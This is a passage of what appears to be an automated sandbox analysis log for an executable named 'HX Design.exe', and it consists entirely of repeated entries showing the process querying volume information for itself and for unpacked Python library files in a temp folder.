              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\mydata.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\mydata.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\mydata.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\mydata.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\mydata.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\mydata.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer\md.cp313-win_amd64.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\charset_normalizer\md__mypyc.cp313-win_amd64.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\certifi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\Desktop\HX Design.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HX Design.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75082 VolumeInformationJump to behavior
